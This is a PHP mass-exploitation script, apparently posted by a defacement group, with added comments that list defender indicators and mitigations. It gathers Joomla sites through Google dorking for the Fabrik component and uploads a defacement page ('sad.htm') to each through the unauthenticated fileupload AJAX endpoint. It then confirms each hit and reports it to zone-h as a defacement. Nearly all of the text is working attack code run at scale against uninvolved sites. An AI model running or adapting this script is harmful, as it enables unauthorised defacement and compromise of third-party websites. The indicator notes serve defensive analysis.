- <?php
- /*
- Com_Fabrik Auto Exploit
- Re Code By ZakirDotID
- Thanks To : IndoXploit
- */
/**
 * excom: client that automates an upload attempt against the Joomla Fabrik
 * component's file-upload AJAX endpoint, then reports and logs the outcome.
 * Annotated for analysts and defenders; the code is left exactly as posted.
 *
 * What the visible code does:
 *  - valid()   prepends "http://" to a target that has no http/https scheme.
 *  - exploit() shells out to the curl binary and sends a multipart POST
 *              (form field "file", local file "sad.htm") to
 *              /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
 *  - cUrl()    libcurl wrapper with TLS verification disabled and a fixed
 *              User-Agent string.
 *  - jonh()    posts a notification to the zone-h "notify/single" form.
 *  - simpan()  appends a line to hasil-exploit.txt.
 *
 * Indicators a defender can take from this listing:
 *  - web logs: unauthenticated POSTs to the query string above;
 *  - uploaded file name "sad.htm";
 *  - User-Agent "LinuxG3k/10.1" on requests made through cUrl() (the upload
 *    itself goes through the curl command line and does not set this value);
 *  - on the host that ran the script: "hasil-exploit.txt" and "cookie.txt" in
 *    the working directory.
 *
 * Mitigation notes: sites running Fabrik should confirm this endpoint rejects
 * unauthenticated uploads and keep the extension updated. Affected versions
 * are not stated on this page, and where an uploaded file lands is not visible
 * here, so upload locations need to be checked against the site's own Fabrik
 * configuration.
 */
- class excom
- {
- public $url;
- public $file;
- public $hacker = "ZakirDotID"; // sent as the "defacer" field in jonh()
- public $dorking=1; //Set to 1 to enable auto-dorking mode
- public $var;
- public $ch;
/**
 * Ensure a target string carries a scheme.
 *
 * When $url starts with neither "http://" nor "https://", "http://" is
 * prepended, the result is stored in $this->url and returned. Otherwise $url
 * is returned unchanged and $this->url is not touched by this method.
 */
- public function valid($url){
- if(!preg_match("/^http:\/\//", $url) and !preg_match("/^https:\/\//", $url)){
- return $this->url="http://".$url;
- }else{
- return $url;
- }
- }
/**
 * Submit $url to the zone-h notification form and print the outcome.
 *
 * The POST body carries the handle from $this->hacker plus the URL; cookies
 * are disabled for this call ($cookie = false). The reply is scanned for a red
 * <font> element: the literal text "ERROR" prints the "Not Vuln Zone-H" line,
 * any other captured text prints "Success". Nothing is printed when the
 * pattern does not match at all.
 */
- public function jonh($url){
- $this->var = $this->cUrl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
- if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $this->var->response, $matches)) {
- if($matches[1] === "ERROR") {
// $matches2 captures the error detail but is not used afterwards.
- preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $this->var->response, $matches2);
- echo "[!] $url ==> Not Vuln Zone-H\n";
- } else {
- echo "[+] $url ==> Success\n";
- }
- }
- }
// simpan(): append $file plus CRLF to "hasil-exploit.txt" in the current
// working directory (opened in "a+" mode). This file is a forensic artifact on
// whichever machine ran the script.
- public function simpan($file){$this->var=fopen("hasil-exploit.txt", "a+");fwrite($this->var, $file."\r\n");fclose($this->var);}
/**
 * Send the upload request for $this->url and report the result.
 *
 * The request is built as a shell command string and run with shell_exec();
 * "@" hides any PHP warning. The reply is decoded as JSON and cast to an
 * object: an "error" key prints a "Failed" line for the host, a "uri" key
 * leads to a follow-up fetch that is searched for the case-insensitive string
 * "hacked". Only when that search matches are jonh() and simpan() reached.
 * A reply that is not valid JSON yields an empty object, so neither branch
 * prints anything.
 *
 * NOTE(review): $this->ur1 is interpolated into the command line without
 * escapeshellarg(). The target value ultimately comes from remote search
 * results (see the driver code), so analysts should run this sample only in
 * an isolated sandbox.
 */
- public function exploit(){
- $this->file ="sad.htm"; // local file sent as the multipart "file" field
- $this->ur1 = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
- $this->var = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$this->ur1\"");
- $this->result = (object) json_decode($this->var,true);
- if(isset($this->result->error)){
- echo "[!] ".parse_url($this->url,PHP_URL_HOST). " ==> Failed\n";
- } else {
- if(isset($this->result->uri)){
- if(preg_match("/hacked/i", $this->cUrl($this->uri)->response)){
- echo "[+] $this->result->uri ==> eXploit\n";
- $this->jonh($this->uri);
- $this->simpan($this->uri);
- }
- }
- }
- }
/**
 * Perform one HTTP request through libcurl and return its result.
 *
 * @param string      $url     Request URL.
 * @param mixed       $data    When not null, sent as the POST body.
 * @param array|null  $headers When not null, passed to CURLOPT_HTTPHEADER.
 * @param bool        $cookie  When exactly true, "cookie.txt" in the working
 *                             directory is used as cookie file and cookie jar.
 * @return object Object with "response" (curl_exec() result) and "info"
 *                (curl_getinfo() array).
 *
 * Connect and total timeouts are both 5 seconds.
 */
- public function cUrl($url,$data=null,$headers=null,$cookie=true){
- $this->ch = curl_init();
- curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, TRUE);
- curl_setopt($this->ch, CURLOPT_URL, $url);
- curl_setopt($this->ch, CURLOPT_USERAGENT, "LinuxG3k/10.1"); // fixed UA string; usable as a log indicator
// Certificate and host-name checks are both switched off, so responses over
// HTTPS are not authenticated.
- curl_setopt($this->ch, CURLOPT_SSL_VERIFYHOST, FALSE);
- curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, FALSE);
- curl_setopt($this->ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($this->ch, CURLOPT_TIMEOUT, 5);
- if($data !== null) {
- curl_setopt($this->ch, CURLOPT_CUSTOMREQUEST, "POST");
- curl_setopt($this->ch, CURLOPT_POST, TRUE);
- curl_setopt($this->ch, CURLOPT_POSTFIELDS, $data);
- }
- if($headers !== null) {
- curl_setopt($this->ch, CURLOPT_HTTPHEADER, $headers);
- }
- if($cookie === true) {
- curl_setopt($this->ch, CURLOPT_COOKIE, TRUE);
- curl_setopt($this->ch, CURLOPT_COOKIEFILE, "cookie.txt");
- curl_setopt($this->ch, CURLOPT_COOKIEJAR, "cookie.txt");
- }
- $this->exec = curl_exec($this->ch);
- $this->info = curl_getinfo($this->ch);
- curl_close($this->ch);
- return (object) [
- "response" => $this->exec,
- "info" => $this->info
- ];
- }
// _rd(): return a read handle on php://stdin. Not called anywhere in the
// visible code.
- public function _rd(){return fopen("php://stdin", "r");}
- }
// Driver: builds a target list from search-engine results and calls exploit()
// on each entry. Annotated for defenders; the code is left exactly as posted.
//
// Target selection is purely by indexed URL pattern (the $dork string below).
// No version or vulnerability check is visible before the upload attempt, so
// any indexed site exposing the component URL may receive the request.
- $z = new excom();
- echo "\n\tExploit Com Fabrik With Auto Dorking By ZakirDotID\n";
- if($z->dorking == 1){
- $links = array(); // host names already seen
- $dork ="inurl:/index.php?option=com_fabrik";
// Result offsets 0, 10, ..., 1000: up to 101 search-result pages are requested.
- for($i=0;$i<=1000;$i+=10){
// "@" suppresses the warnings DOMDocument emits on malformed HTML or a failed
// fetch; the results page is requested over plain HTTP.
- @$xml = new DOMDocument('1.0', "UTF-8");
- @$xml->loadHTMLFile("http://www.google.com/search?q=".urlencode($dork)."&start=$i");
// Each <cite> element's text is treated as a URL and reduced to its host part.
- foreach($xml->getElementsByTagName('cite') as $link) {
- $su = "http://$link->nodeValue";
- $ahh = parse_url($su, PHP_URL_HOST);
// Hosts already collected, or containing "blogspot", are skipped with a message.
- if(in_array($ahh, $links) or preg_match("/blogspot/",$ahh)) {
- echo "$ahh element is in the array";
- } else{
- $links[] = $ahh;
// Every newly added host triggers a pass over the whole accumulated list, so
// hosts found earlier are requested again on each pass. In a target's logs
// this shows up as repeated identical upload attempts from one source.
- foreach ($links as $asu) {
- $z->url = $z->valid($asu);
- echo $z->exploit();
- }
- }
- }
- }
- }